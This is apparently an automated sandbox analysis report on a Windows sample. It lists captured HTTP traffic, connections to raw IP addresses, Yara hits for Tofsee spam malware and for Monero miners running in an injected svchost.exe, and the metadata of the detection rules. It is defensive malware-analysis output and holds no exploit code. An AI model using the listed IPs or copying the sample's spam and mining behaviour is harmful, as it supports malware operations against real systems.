e9 ec 2e a4 a9 cf ee 8a 8c 6c f0 c9 a1 a9 bb c6 fb 47 5d a7 dc c4 26 21 d9 6b 6c 08 51 09 b8 9e 4e a7 4d 3f 97 d0 74 44 f4 5f 06 5b fb 91 36 7d ee 6d 32 6a 33 ec fe 5f 56 41 7e 36 1b d4 eb f5 37 d1 99 53 ee aa 60 8d ba 33 68 6f a4 0e 18 f7 03 f5 57 f2 36 4b c3 35 73 26 dc 65 a2 29 00 e6 e9 0a 35 56 42 20 cf cf f8 a8 c0 db 9e 5e ac f6 a4 9a c1 bf 2d df a6 e9 f6 96 9f 49 96 3e 79 20 b1 21 f9 2f 66 b6 3a c9 e3 30 a1 ae cb 63 bf a1 44 62 b6 92 47 f2 86 47 89 48 15 8d d5 70 9e f3 3d 15 f1 31 db ed e4 71 5e ca a8 98 6c a1 94 88 cc dd 65 3e ac 9e 0d 1a 72 3f 36 53 64 9d 37 7d 3b d8 86 87 fb 64 8b d4 85 50 54 ca a4 08 b9 4b b6 9c 81 bb eb b5 86 35 cb 40 15 32 55 ba 8d 61 22 e0 a0 40 70 4d 6a 03 53 a6 d8 10 65 b4 77 c0 83 3c db 66 cb 30 de ce ff 88 98 cb 29 81 82 f1 04 ec ad ba e9 43 38 c3 3e 8f 1b b9 45 66 b3 cb a2 e1 04 42 c8 1d 1a 96 b6 82 c0 d2 63 2f 14 54 99 21 f3 d4 7c 4e 51 d0 36 3e 77 9e 72 c7 5c e6 88 94 e6 b6 64 31 38 93 57 ab 67 ef 97 18 1c 11 8a d4 dc 32 0c a7 4e 01 5b 9c d4 f7 5d b7 cf da bb 2b 24 de 12 c9 c0 30 ea fb 7f db d3 8b d4 96 19 b6 85 3b db 56 ee 36 dd 4e b6 9b 41 91 63 8f 46 3c 9c 99 34 e5 34 dc 96 34 46 2c a6 dc 9b 23 ed 93 Data Ascii: XZJSt[-#@@ !%Z[6wg']\|bBu%G{$\H:"a$@u,M-/4475;y!
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 05 Sep 2021 13:50:13 GMTExpires: -1Cache-Control: private, max-age=0Content-Type: text/html; charset=UTF-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Encoding: gzipServer: gwsContent-Length: 2297X-XSS-Protection: 0X-Frame-Options: SAMEORIGINSet-Cookie: NID=222=TZeMRI83A5yxCpWaE5t8YmTniWa2XqKllJusSyyjovgnFq_HccHtLugm99J6tzkasjk-hl2MUo2jfVUVD9xq2ne7bZ59KThhdY5mCGOtKYGHxH2NtsWyEqjmU-qmhVgvmUhtgoCdbtQXuUZ8SfAmQtSqOoZ50ABCP35Gefis6hw; expires=Mon, 07-Mar-2022 13:50:13 GMT; path=/; domain=.google.com; HttpOnlyData Raw: 1f 8b 08 00 00 00 00 00 02 ff cd 58 dd 5a db 3c 12 3e df ab 50 cd 53 f6 84 c4 4e 42 02 71 70 fa 41 f9 2d a5 85 42 69 fb 9d f0 c8 b6 6c ab d8 96 b1 e4 84 94 cd bd ec b5 ec 95 ed 8c 65 87 fc 15 f6 60 f7 d9 2f 07 8e 25 cd 8c e6 e7 d5 cc c8 7b 6f 7c e1 a9 49 c6 48 a4 92 78 b8 87 4f c2 15 4b a4 27 32 e6 18 46 39 40 02 c7 88 94 ca 6c d3 94 5e c4 12 da 14 79 68 7e 63 ee 25 0d 99 41 62 9a 86 8e c1 d2 c6 c9 81 01 42 18 f5 87 7b 09 53 94 20 4f 83 3d 14 7c e4 18 ef 45 aa 58 aa 1a 37 20 cd 20 9e 1e 39 86 62 8f ca c4 7d 07 c4 8b 68 2e 99 72 be de 1c 37 76 8d 4a c4 8c d0 8c 45 28 a4 e9 0b e1 c7 4c 9a 6d ab dd aa 06 0d 60 4c 32 2e d2 06 97 a0 8a df 08 69 c2 64 43 b2 0c 94 77 59 de b0 ba 8d de 4e b7 d3 eb b6 76 3b 3b 2d ab df ee b7 1b 71 33 4b 43 6d 5f 96 8b cc 31 78 82 b6 2c ef 7a 58 ee 40 de 57 3b 90 b3 72 07 72 82 3b bc 31 08 b2 b2 5c 4d c0 8e 31 57 8a e5 b6 e2 2a 5e 15 73 cc 62 9e 32 52 64 24 10 39 a1 68 6a 1c b3 34 64 ef c8 29 8b 33 f2 b1 f0 ee 27 c4 8b 29 4f c8 88 7b 4a e4 13 c2 53 a2 22 46 5e d4 80 6c 9c 08 11 c6 4c 13 ad d3 c7 67 d2 cb 79 a6 80 f5 2f a0 95 08 5f 54 48 16 49 42 f3 c9 5d 4c f3 90 dd e9 88 ac b1 c9 a3 b9 bf c2 fb c7 fc 9e 72 1d 9b 84 60 af b0 21 44 25 e0 7a 3c 1e 37 c3 52 42 d3 13 c9 7f 19 6c ed 47 da 0c 79 b0 4e a9 f5 b0 fb 7f 69 05 f1 59 af 50 af b7 bb 8e ce 1e 73 5f 45 2b d4 9d 7e 7b 2d 75 c4 78 18 a9 bf 92 b5 45 1e af a8 33 e2 3e 13 4d 01 30 cf 97 a8 31 13 02 79 79 c6 87 1a 6f 7b a6 1e ed 49 35 81 bf 8d d0 a5 f9 d6 46 58 48 96 3f 05 20 b1 21 f9 2f 66 b7 3a d9 e3 20 a3 be cf d3 b0 a1 44 66 b7 b2 47 f2 86 27 99 c8 15 4d d5 60 5a f2 3d 69 ff d8 ed 76 f6 38 ad 64 d4 4c ae 50 4a 24 f6 ce 22 1f 66 cf 06 8d 79 98 da 39 b2 4e 9b a1 1b 6d c1 c3 7f 72 45 ee 83 2b ea cd a4 88 b9 4f 36 bc be bf 13 b4 06 73 9a c1 56 c8 54 ef 6d 0d 32 01 07 05 9c 6b 53 17 98 0a c5 06 28 a3 bd 0d 16 94 d1 b6 5b 96 f5 76 fa 47 c2 7c 4e 09 24 8c 27 60 6f cd ab 3e 80 33 1c f2 b4 51 6a 64 37 bb 2c 19 8c c0 85 dc a3 71 a5 2b 08 ac 2c 0e 62 41 95 1d b3 40 4d a7 14 05 6d e1 73 fb a9 34 cc 67 9e c8 69 a9 4b 91 82 31 65 b6 7a b6 7e 81 c1 13 b1 c8 ed 0d cb f2 e6 29 60 89 93 f9 75 df df 65 ed 9d 25 92 60 81 a4 6f 59 f3 eb 7f db 33 75 68 ab 08 bb c2 9f 6c 29 7f 8b 6e 65 5b cd 48 c7 38 a0 09 8f 27 36 cd 39 8d b7 24 4d 11 8b 39 0f a6 Data Ascii: XZ<>PSNBqpA-Bile`/%{o\|IHxOK'2F9@l^yh~c%AbB{S O=
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 05 Sep 2021 13:50:13 GMTExpires: -1Cache-Control: private, max-age=0Content-Type: text/html; charset=UTF-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Encoding: gzipServer: gwsContent-Length: 2297X-XSS-Protection: 0X-Frame-Options: SAMEORIGINSet-Cookie: NID=222=vwDlxxBGuq617fBhvhNOJ-Q20xcukHZww6M8G2TWopbJYCGN7460bHOnmmH0KWEg0PSxCyEL0Gzr8aWzHIlJPDmBW34Z1fxYE_Da8eyQ-Fim5xDlPIk4TBGoHiy1if-MbAyURM1EQqhSs8j9_4tR1MEhIfZ1Km6eH0NyVxOW1EM; expires=Mon, 07-Mar-2022 13:50:13 GMT; path=/; domain=.google.com; HttpOnlyData Raw: 1f 8b 08 00 00 00 00 00 02 ff cd 58 d9 5a db 4a 12 be 9f a7 e8 88 2f 99 1b 6c c9 36 06 5b 46 ce 31 4b 80 40 12 38 2c 81 dc f0 b5 a4 96 d4 41 52 0b 75 cb c6 61 fc 2e f3 2c f3 64 53 a5 c5 c8 4b 60 2e 66 be 39 5c 08 b7 ba f6 fa bb aa 5a bb ef 5c e1 a8 69 c2 48 a0 a2 70 b8 8b 4f c2 15 8b a4 23 12 66 69 5a be 40 02 4b 0b 94 4a 4c 5d 97 4e c0 22 da 14 a9 af 7f 67 f6 39 f5 99 46 42 1a fb 96 c6 e2 c6 d1 9e 06 42 18 75 87 bb 11 53 94 20 4f 83 3d 66 7c 6c 69 fb 22 56 2c 56 8d 2b 90 a6 11 a7 58 59 9a 62 4f 4a 47 bd 03 e2 04 34 95 4c 59 d7 57 9f 1a 3d ad 14 31 27 d4 43 e1 0b a9 bb 42 b8 21 93 7a db 68 b7 ca 45 03 18 a3 84 8b b8 c1 25 98 e2 36 7c 1a 31 d9 90 2c 01 e3 6d 96 36 8c 6e 63 7b a7 db d9 ee b6 7a 9d 9d 96 d1 6f f7 db 8d b0 99 c4 7e e1 5f 92 8a c4 d2 78 84 be 2c 6b 3d c8 35 90 fd 52 03 39 c9 35 90 23 d4 f0 4e 23 c8 ca 52 35 05 3f 26 5c 29 96 9a 8a ab 70 55 cc 27 16 f2 98 91 2c 21 9e 48 09 45 57 c3 90 c5 3e fb 48 8e 59 98 90 b3 cc 79 98 12 27 a4 3c 22 63 ee 28 91 4e 09 8f 89 0a 18 79 d5 02 b2 71 24 84 1f b2 82 68 9d 3d 2e 93 4e ca 13 05 ac 7f 01 ab 84 ff aa 41 32 8b 22 9a 4e ef 43 9a fa ec be c8 c8 1a 9f 1c 9a ba 2b bc 7f d4 75 ca 75 6c 12 92 bd c2 86 10 95 80 eb c9 64 d2 f4 73 09 4d 47 44 ff 65 b0 b5 9f 68 d3 e7 de 3a a3 d6 c3 ee ff 65 15 e4 67 bd 41 db db bd 75 74 e6 84 bb 2a 58 a1 ee f4 db 6b a9 03 c6 fd 40 fd 95 bc cd d2 70 c5 9c 31 77 99 68 0a 80 79 ba 44 8d 95 10 c8 f3 33 3e 2c f0 b6 ab 17 ab 5d a9 a6 f0 6f c3 b7 69 ba b9 e1 67 92 a5 cf 1e 48 6c 48 fe 8b 99 ad 4e f2 34 48 a8 eb f2 d8 6f 28 91 98 ad e4 89 bc e3 51 22 52 45 63 35 98 e5 7c cf 45 7c cc 76 3b 79 9a 95 32 2a 26 5b 28 25 22 73 67 91 0f ab 67 83 86 dc 8f cd 14 59 67 4d df 0e 36 e1 e1 3e db 22 75 21 14 95 32 29 42 ee 92 0d a7 ef ee 78 ad 41 cd 32 50 85 4c 95 6e 63 90 08 38 28 10 5c 93 da c0 94 29 36 40 19 ed 2d f0 20 cf b6 d9 32 8c f7 b3 3f 22 e6 72 4a a0 60 3c 03 7b ab 6e fa 00 ce b0 cf e3 46 6e 91 d9 ec b2 68 30 86 10 72 87 86 a5 ad 20 b0 f4 d8 0b 05 55 66 c8 3c 35 9b 51 14 b4 89 cf ad e7 dc 31 97 39 22 a5 b9 2d 59 0c ce e4 d5 ea c5 fb 05 06 47 84 22 35 37 0c c3 a9 53 c0 16 27 f5 7d d7 ed b1 f6 ce 12 89 b7 40 d2 37 8c fa fe df 76 f5 22 b5 65 86 6d e1 4e 37 95 bb 49 37 93 cd 66 50 e4 d8 a3 11 0f a7 26 4d 39 0d 37 25 8d 11 8b 29 f7 66 48 fb Data Ascii: XZJ/l6[F1K@8,ARua.,dSK`.f9\Z\iHpO#fiZ@KJL]N"g9FBBuS O=f

Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.42
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.43
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.195.92
Source: unknown	TCP traffic detected without corresponding DNS query: 213.227.140.23
Source: unknown	TCP traffic detected without corresponding DNS query: 5.61.37.41
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.195.92
Source: unknown	TCP traffic detected without corresponding DNS query: 213.227.140.23
Source: unknown	TCP traffic detected without corresponding DNS query: 5.61.37.41
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.43
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown	TCP traffic detected without corresponding DNS query: 213.227.140.23
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.42
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.195.92
Source: unknown	TCP traffic detected without corresponding DNS query: 5.61.37.41
Source: unknown	TCP traffic detected without corresponding DNS query: 213.227.140.23
Source: unknown	TCP traffic detected without corresponding DNS query: 5.61.37.41
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.195.92
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.43
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.42
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.43
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.42
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.43
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.42
Source: unknown	TCP traffic detected without corresponding DNS query: 213.227.140.23
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.195.92
Source: unknown	TCP traffic detected without corresponding DNS query: 5.61.37.41
Source: unknown	TCP traffic detected without corresponding DNS query: 213.227.140.23
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.195.92
Source: unknown	TCP traffic detected without corresponding DNS query: 5.61.37.41
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.42
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.43
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.43
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.42
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.195.92
Source: unknown	TCP traffic detected without corresponding DNS query: 213.227.140.23
Source: unknown	TCP traffic detected without corresponding DNS query: 5.61.37.41
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.195.92
Source: unknown	TCP traffic detected without corresponding DNS query: 213.227.140.23
Source: unknown	TCP traffic detected without corresponding DNS query: 5.61.37.41
Source: unknown	TCP traffic detected without corresponding DNS query: 213.227.140.23
Source: unknown	TCP traffic detected without corresponding DNS query: 213.227.140.23
Source: unknown	TCP traffic detected without corresponding DNS query: 5.61.37.41
Source: unknown	TCP traffic detected without corresponding DNS query: 5.61.37.41
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.195.92

Spam, unwanted Advertisements and Ransom Demands:

Yara detected Tofsee

Show sources

Source: Yara match	File source: 0.2.HsWJJz7nq4.exe.2230e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.kwrovuui.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.kwrovuui.exe.2180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.kwrovuui.exe.2230000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.kwrovuui.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.HsWJJz7nq4.exe.2250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HsWJJz7nq4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.kwrovuui.exe.2230000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.kwrovuui.exe.2160e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HsWJJz7nq4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.665871062.0000000002230000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.664485787.0000000002180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.643630802.0000000002250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HsWJJz7nq4.exe PID: 5588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: kwrovuui.exe PID: 5672, type: MEMORYSTR

Send many emails (e-Mail Spam)

Show sources

Source: SMTP

Network traffic detected: Mail traffic on many different IPs 64

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 18.3.svchost.exe.af00000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero mining software Author: Florian Roth
Source: 18.3.svchost.exe.af00000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.3.svchost.exe.af00000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Monero mining software Author: Christiaan Beek \| McAfee ATR Team
Source: 18.3.svchost.exe.af00000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Monero mining software Author: Florian Roth
Source: 18.3.svchost.exe.af00000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.3.svchost.exe.af00000.2.unpack, type: UNPACKEDPE	Matched rule: Monero mining software Author: Christiaan Beek \| McAfee ATR Team
Source: 18.3.svchost.exe.ac00000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero mining software Author: Florian Roth
Source: 18.3.svchost.exe.ac00000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.3.svchost.exe.ac00000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Monero mining software Author: Christiaan Beek \| McAfee ATR Team
Source: 18.3.svchost.exe.ac00000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Monero mining software Author: Florian Roth
Source: 18.3.svchost.exe.ac00000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.3.svchost.exe.ac00000.3.unpack, type: UNPACKEDPE	Matched rule: Monero mining software Author: Christiaan Beek \| McAfee ATR Team
Source: 00000012.00000003.679847129.000000000AC00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Monero mining software Author: Florian Roth
Source: 00000012.00000003.679847129.000000000AC00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000012.00000003.679847129.000000000AC00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Monero mining software Author: Christiaan Beek \| McAfee ATR Team
Source: 00000012.00000003.679731110.000000000AF00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Monero mining software Author: Florian Roth
Source: 00000012.00000003.679731110.000000000AF00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000012.00000003.679731110.000000000AF00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Monero mining software Author: Christiaan Beek \| McAfee ATR Team

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Code function: 0_2_0040C913		0_2_0040C913
Source: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe	Code function: 14_2_0040C913		14_2_0040C913

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe

Code function: 0_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,

0_2_00401280

Source: HsWJJz7nq4.exe	Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
Source: HsWJJz7nq4.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: HsWJJz7nq4.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: HsWJJz7nq4.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: HsWJJz7nq4.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: HsWJJz7nq4.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: HsWJJz7nq4.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: HsWJJz7nq4.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: HsWJJz7nq4.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kwrovuui.exe.0.dr	Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
Source: kwrovuui.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kwrovuui.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kwrovuui.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kwrovuui.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kwrovuui.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kwrovuui.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kwrovuui.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kwrovuui.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: HsWJJz7nq4.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: 18.3.svchost.exe.af00000.2.raw.unpack, type: UNPACKEDPE	Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth, description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.3.svchost.exe.af00000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.3.svchost.exe.af00000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MINER_monero_mining_detection date = 2018-04-05, actor_group = Unknown, actor_type = Cybercrime, author = Christiaan Beek \| McAfee ATR Team, description = Monero mining software, malware_family = Ransom:W32/MoneroMiner, rule_version = v1, malware_type = miner
Source: 18.3.svchost.exe.af00000.2.unpack, type: UNPACKEDPE	Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth, description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.3.svchost.exe.af00000.2.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.3.svchost.exe.af00000.2.unpack, type: UNPACKEDPE	Matched rule: MINER_monero_mining_detection date = 2018-04-05, actor_group = Unknown, actor_type = Cybercrime, author = Christiaan Beek \| McAfee ATR Team, description = Monero mining software, malware_family = Ransom:W32/MoneroMiner, rule_version = v1, malware_type = miner
Source: 18.3.svchost.exe.ac00000.3.raw.unpack, type: UNPACKEDPE	Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth, description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.3.svchost.exe.ac00000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.3.svchost.exe.ac00000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MINER_monero_mining_detection date = 2018-04-05, actor_group = Unknown, actor_type = Cybercrime, author = Christiaan Beek \| McAfee ATR Team, description = Monero mining software, malware_family = Ransom:W32/MoneroMiner, rule_version = v1, malware_type = miner
Source: 18.3.svchost.exe.ac00000.3.unpack, type: UNPACKEDPE	Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth, description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.3.svchost.exe.ac00000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.3.svchost.exe.ac00000.3.unpack, type: UNPACKEDPE	Matched rule: MINER_monero_mining_detection date = 2018-04-05, actor_group = Unknown, actor_type = Cybercrime, author = Christiaan Beek \| McAfee ATR Team, description = Monero mining software, malware_family = Ransom:W32/MoneroMiner, rule_version = v1, malware_type = miner
Source: 00000012.00000003.679847129.000000000AC00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth, description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000012.00000003.679847129.000000000AC00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000012.00000003.679847129.000000000AC00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MINER_monero_mining_detection date = 2018-04-05, actor_group = Unknown, actor_type = Cybercrime, author = Christiaan Beek \| McAfee ATR Team, description = Monero mining software, malware_family = Ransom:W32/MoneroMiner, rule_version = v1, malware_type = miner
Source: 00000012.00000003.679731110.000000000AF00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth, description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000012.00000003.679731110.000000000AF00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
